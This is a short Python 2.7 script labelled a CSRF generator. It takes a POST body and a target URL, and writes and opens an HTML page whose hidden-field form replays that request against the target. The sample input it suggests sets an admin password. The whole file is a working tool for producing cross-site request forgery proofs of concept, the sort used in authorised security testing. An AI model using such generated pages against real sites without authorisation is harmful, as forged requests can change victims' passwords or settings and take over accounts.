  1. #!/usr/bin/python2.7
  2. #CSRF-GENERATOR
  3.  
  4. import time
  5. import os
  6. import urllib, webbrowser
  7.  
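# The form body is read once, at import time, because parse_request() reads
# this module-level name. The `global` statement that used to precede it was a
# no-op at module scope and has been dropped.
in_w = raw_input('POST request (e.g. name=admin&password=hacked123): ')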
  10.  
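def parse_request(var=False, value=False, longz=False, request=None):
    """Split a URL-encoded POST body into its field names and values.

    The body is the module-level ``in_w`` unless ``request`` is given.
    Pairs are separated on ``&`` and ``=`` *before* percent-decoding, so an
    encoded ``%26`` or ``%3D`` inside a value stays data instead of being
    treated as a separator; ``+`` decodes to a space as in form submissions.
    A pair without ``=`` gets an empty value; an empty body has no pairs.

    The flags are checked in the order var, value, longz and the first one
    set selects the result:
      var   -- the list of field names
      value -- the list of field values
      longz -- the number of pairs
    With no flag set the function returns None, as before.
    """
    try:
        from urllib import unquote_plus  # Python 2
    except ImportError:
        from urllib.parse import unquote_plus  # Python 3
    raw = in_w if request is None else request
    var_list = []
    value_list = []
    # ''.split('&') would yield [''] and produce a phantom empty field.
    for pair in (raw.split('&') if raw else []):
        name, _sep, val = pair.partition('=')
        var_list.append(unquote_plus(name))
        value_list.append(unquote_plus(val))
    if var:
        return var_list
    if value:
        return value_list
    if longz:
        return len(var_list)
    return None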
  28.        
  29.    
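def generate_csrf_poc(target_url, fields=None):
    """Build an HTML page holding a POST form with one hidden input per field.

    target_url -- the form's action URL
    fields     -- optional sequence of (name, value) pairs; when omitted the
                  pairs come from parse_request(), i.e. the module-level in_w

    Returns the page as one string. The URL, names and values are escaped for
    use inside double-quoted HTML attributes, so a quote, ampersand or angle
    bracket in the data cannot terminate the attribute and the value carried
    by the form matches the parsed one.
    """
    if fields is None:
        fields = zip(parse_request(True, False, False),
                     parse_request(False, True, False))

    def attr(text):
        # '&' is replaced first so the entities produced below are not re-encoded.
        return (text.replace('&', '&amp;').replace('"', '&quot;')
                    .replace('<', '&lt;').replace('>', '&gt;'))

    # <form> is a container element, so it must not be written self-closing.
    lines = ['<html>', '<body>',
             '<form action="%s" method="POST">' % attr(target_url)]
    for name, val in fields:
        lines.append('<input type="hidden" name="%s" value="%s"/>'
                     % (attr(name), attr(val)))
    lines.append('<input type="submit" value="csrf"/>')
    lines.extend(['</form>', '</body>', '</html>'])
    return '\n'.join(lines)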
  40.  
  41.  
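def main():
    """Prompt for the target URL, write the generated page as <unix-time>.html
    in the current directory, echo it, and open it in the default browser.

    The page is generated once (it used to be generated twice, once for the
    echo and once for the file) and the file is only created after generation
    succeeded, so a failure leaves no empty .html behind.
    """
    ask_for_url = raw_input('url address: ')
    page = generate_csrf_poc(ask_for_url)
    print(page)
    path = os.path.abspath(str(time.time()) + '.html')
    print('csrf file: ' + path)
    with open(path, 'w') as csrf_file:
        csrf_file.write(page)
    webbrowser.open(path)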
  52.  
  53.  
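# Only run when executed as a script, so importing the module for its
# functions does not trigger the prompts and the browser launch.
if __name__ == '__main__':
    main()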